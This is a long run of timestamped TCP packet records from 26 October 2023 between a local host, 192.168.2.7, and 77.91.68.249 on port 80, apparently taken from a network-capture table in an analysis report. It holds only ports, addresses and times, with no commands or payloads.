                                                                              Oct 26, 2023 09:47:47.101186037 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101227999 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101246119 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101289034 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101306915 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101321936 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101349115 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101372957 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101392984 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101437092 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101454973 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101500988 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101520061 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101562977 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101577044 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101640940 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101682901 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101707935 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101747036 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101782084 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101813078 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.101821899 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101850033 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.101980925 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102032900 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102054119 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102073908 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102080107 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102123022 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102139950 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102178097 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102189064 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102225065 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102231026 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102272987 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102293015 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102333069 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102334023 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102372885 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102390051 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102427006 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102441072 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102487087 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102490902 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102528095 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102531910 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102570057 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102585077 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102616072 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102623940 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102658033 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102696896 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102734089 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102740049 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102777958 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102777958 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102793932 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102822065 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102835894 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102876902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102915049 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102924109 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102946043 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.102950096 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102987051 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.102998018 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.103034019 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.103051901 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.103091002 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167527914 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167584896 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167644978 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167660952 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167691946 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167691946 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167751074 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167764902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167797089 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167802095 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167813063 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167850018 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167870045 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167912006 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167921066 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.167959929 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.167980909 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168019056 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168037891 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168072939 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168095112 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168133020 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168150902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168190956 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168227911 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168266058 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168266058 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168307066 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168315887 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168344975 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168370962 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168387890 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168428898 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168467999 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168481112 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168519020 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168554068 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168595076 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168631077 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168668985 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168684006 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168721914 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168756008 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168792963 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168826103 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168839931 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168864012 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168884993 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168931961 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.168972015 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.168989897 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169028044 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169045925 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169085026 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169156075 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169195890 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169214964 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169254065 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169267893 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169306993 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169325113 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169363022 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.169373035 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.169414997 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.258941889 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259015083 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259054899 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259098053 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259099960 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259135008 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259135008 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259140015 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259155035 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259183884 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259185076 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259224892 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259228945 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259264946 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259267092 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259305000 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259309053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259349108 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.259356022 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.259399891 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.296202898 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.296343088 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297182083 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297235012 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297373056 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297425985 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297486067 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297535896 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297600985 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297646999 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297662020 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297705889 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297748089 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297786951 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297792912 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297827005 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297832966 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297864914 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297905922 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.297950029 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297987938 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.297991037 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298024893 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298033953 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298075914 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298084974 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298126936 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298130989 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298170090 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298177004 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298216105 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298227072 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298265934 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298274994 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298316002 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298372030 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298408985 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298408985 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298445940 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298479080 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298521042 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298525095 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298564911 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298568010 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298604965 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298614979 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298635006 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298650980 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298667908 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298757076 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298794985 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298799992 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298829079 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298841953 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298875093 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298892021 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.298924923 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.298968077 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299000025 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299048901 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299082994 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299082994 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299118042 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299145937 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299177885 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299207926 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299241066 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299285889 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299319983 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299400091 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299462080 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299495935 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299542904 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299576044 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299582958 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299650908 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299679041 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299706936 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299727917 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299741030 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299750090 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299782038 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.299810886 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.299849033 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300379038 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300416946 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300420046 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300455093 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300498962 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300566912 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300621033 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300642014 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300642014 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300669909 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300734997 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300739050 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300739050 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300795078 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300818920 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300879002 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.300895929 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.300908089 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301022053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301022053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301079035 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301111937 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301134109 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301166058 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301167965 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301198959 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301225901 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301261902 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301837921 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301881075 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301906109 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.301938057 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.301974058 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302005053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302021027 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302052975 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302078009 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302113056 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302189112 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302222967 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302248001 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302284002 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302325010 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302360058 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302402020 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302438021 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302500963 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302535057 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302550077 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302589893 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302617073 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302650928 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302717924 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302752972 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302815914 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302846909 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302871943 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302905083 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302912951 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.302948952 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.302973032 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303006887 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303026915 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303061962 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303103924 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303117990 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303152084 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303153038 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303183079 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303221941 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303253889 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303299904 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303330898 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303412914 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303445101 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303477049 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303508043 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303550959 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303584099 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303636074 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303669930 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303723097 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303757906 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303821087 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303854942 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303857088 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.303889036 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.303968906 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.304001093 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.304009914 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.304042101 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.304066896 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.304099083 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.304147005 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.304178953 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.304287910 CEST804975177.91.68.249192.168.2.7
